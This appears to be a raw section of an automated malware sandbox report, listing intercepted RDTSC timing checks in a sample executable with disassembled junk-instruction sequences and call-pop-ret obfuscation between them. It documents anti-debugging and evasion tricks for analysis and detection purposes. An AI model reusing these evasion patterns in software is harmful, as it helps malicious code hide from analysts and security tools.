Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1040FEC second address: 1041006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F6184CCBA86h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1041006 second address: 104100A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1041496 second address: 104149C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1041786 second address: 1041799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F6184834896h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1041799 second address: 10417AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6184CCBA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F6184CCBA76h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10417AD second address: 10417CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F61848348A4h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044B38 second address: 1044B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6184CCBA82h 0x00000008 jp 00007F6184CCBA76h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F6184CCBA7Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044B61 second address: 1044B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044DC5 second address: 1044DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104511C second address: 1045120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10453B0 second address: 10453BA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6184CCBA7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10458B4 second address: 10458B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104629B second address: 104629F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104629F second address: 10462A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1049E5A second address: 1049E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1049B7D second address: 1049B82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1049E60 second address: 1049E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1049B82 second address: 1049B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104B45B second address: 104B45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104B22A second address: 104B230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104E5E6 second address: 104E622 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F6184CCBA76h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push edi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop edi 0x0000001b push esi 0x0000001c jmp 00007F6184CCBA85h 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007F6184CCBA76h 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10029F4 second address: 1002A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A5h 0x00000007 js 00007F6184834896h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F618483489Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1002A1B second address: 1002A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6184CCBA85h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jg 00007F6184CCBA76h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1002A42 second address: 1002A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1002A47 second address: 1002A59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6184CCBA7Ch 0x00000008 jns 00007F6184CCBA76h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1002A59 second address: 1002A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1002A5D second address: 1002A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1053959 second address: 105395F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105395F second address: 1053963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1053963 second address: 10539DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6184834898h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jmp 00007F61848348A6h 0x0000002e xor di, E038h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov ebx, edi 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov eax, dword ptr [ebp+122D03FDh] 0x00000049 mov dword ptr [ebp+122D2106h], edi 0x0000004f push FFFFFFFFh 0x00000051 mov bh, 62h 0x00000053 mov ebx, dword ptr [ebp+122D2C5Eh] 0x00000059 nop 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jns 00007F6184834896h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10539DF second address: 10539FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6184CCBA83h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10556BF second address: 1055732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F61848348A3h 0x0000000d jmp 00007F618483489Bh 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F6184834898h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov dword ptr [ebp+124502D7h], edx 0x00000034 push 00000000h 0x00000036 clc 0x00000037 push 00000000h 0x00000039 mov bx, 26A8h 0x0000003d push eax 0x0000003e jc 00007F61848348B3h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F61848348A5h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10539FC second address: 1053A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105665D second address: 10566B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6184834898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb ebx, 090ECD9Dh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F6184834898h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov edi, 476A8C4Bh 0x00000032 push 00000000h 0x00000034 jmp 00007F61848348A4h 0x00000039 xchg eax, esi 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1055865 second address: 105591A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6184CCBA76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6184CCBA7Fh 0x00000014 nop 0x00000015 jmp 00007F6184CCBA7Bh 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bx, cx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov edi, dword ptr [ebp+122D2B46h] 0x00000031 mov edi, ecx 0x00000033 mov eax, dword ptr [ebp+122D1691h] 0x00000039 jmp 00007F6184CCBA89h 0x0000003e push FFFFFFFFh 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007F6184CCBA78h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a call 00007F6184CCBA7Eh 0x0000005f mov dword ptr [ebp+122D2E1Dh], esi 0x00000065 pop edi 0x00000066 mov dword ptr [ebp+122D23EDh], edi 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push edx 0x00000070 jmp 00007F6184CCBA80h 0x00000075 pop edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105591A second address: 105591F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10577F0 second address: 10577F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10568F0 second address: 1056901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10577F5 second address: 1057826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 jg 00007F6184CCBA7Ch 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 mov bx, cx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2CF6h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 jo 00007F6184CCBA76h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1059A10 second address: 1059A16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105A8E1 second address: 105A8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1059A16 second address: 1059A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105B7AC second address: 105B816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6184CCBA7Ch 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D2F4Ch] 0x00000016 jmp 00007F6184CCBA88h 0x0000001b push 00000000h 0x0000001d and ebx, 206F9BD2h 0x00000023 push 00000000h 0x00000025 sub edi, dword ptr [ebp+122D2B66h] 0x0000002b xchg eax, esi 0x0000002c push edi 0x0000002d push esi 0x0000002e jmp 00007F6184CCBA81h 0x00000033 pop esi 0x00000034 pop edi 0x00000035 push eax 0x00000036 push ebx 0x00000037 pushad 0x00000038 push edi 0x00000039 pop edi 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C63D second address: 105C641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C641 second address: 105C647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105C647 second address: 105C6C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61848348A2h 0x00000008 jmp 00007F618483489Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jg 00007F61848348A0h 0x00000019 mov edi, dword ptr [ebp+1244CC55h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F6184834898h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+122D2E6Bh] 0x00000041 push 00000000h 0x00000043 add ebx, dword ptr [ebp+122D2867h] 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d jno 00007F6184834896h 0x00000053 pop ecx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105D5DE second address: 105D66D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F6184CCBA7Eh 0x00000011 nop 0x00000012 and ebx, 49EEBFB8h 0x00000018 mov dword ptr [ebp+122D238Dh], ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F6184CCBA78h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+124502A9h], edi 0x00000040 clc 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F6184CCBA78h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D2C1Ah] 0x00000063 mov di, A2CEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105D66D second address: 105D677 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105E71D second address: 105E721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105B9AD second address: 105B9B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105E721 second address: 105E738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6184CCBA7Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F671 second address: 105F682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F618483489Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F682 second address: 105F686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F686 second address: 105F68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F68C second address: 105F6FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F6184CCBA80h 0x00000011 sub edi, dword ptr [ebp+122D22ECh] 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F6184CCBA78h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D2C72h] 0x0000003a push 00000000h 0x0000003c stc 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F6184CCBA7Dh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 105F949 second address: 105F94E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106187C second address: 1061882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10608CF second address: 10608F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F61848348A9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1065453 second address: 1065457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E248 second address: 100E24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E24E second address: 100E252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 100E252 second address: 100E273 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007F6184834896h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 jnc 00007F618483489Ch 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106D030 second address: 106D03D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106D03D second address: 106D043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C6D5 second address: 106C6EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA85h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C846 second address: 106C853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F618483489Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C853 second address: 106C857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106CB2B second address: 106CB6A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F618483489Ah 0x00000012 pop edx 0x00000013 popad 0x00000014 pushad 0x00000015 jns 00007F61848348B1h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1071B6B second address: 1071B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1076CBD second address: 1076CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1076CC6 second address: 1076CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA83h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jnp 00007F6184CCBA76h 0x00000011 jno 00007F6184CCBA76h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077418 second address: 1077434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61848348A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077434 second address: 1077452 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6184CCBA76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jns 00007F6184CCBA76h 0x00000015 pop ecx 0x00000016 jc 00007F6184CCBA87h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077452 second address: 1077468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F618483489Bh 0x00000009 popad 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1062BC6 second address: 1062BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6184CCBA81h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D54 second address: 1078D5E instructions: 0x00000000 rdtsc 0x00000002 je 00007F6184834896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
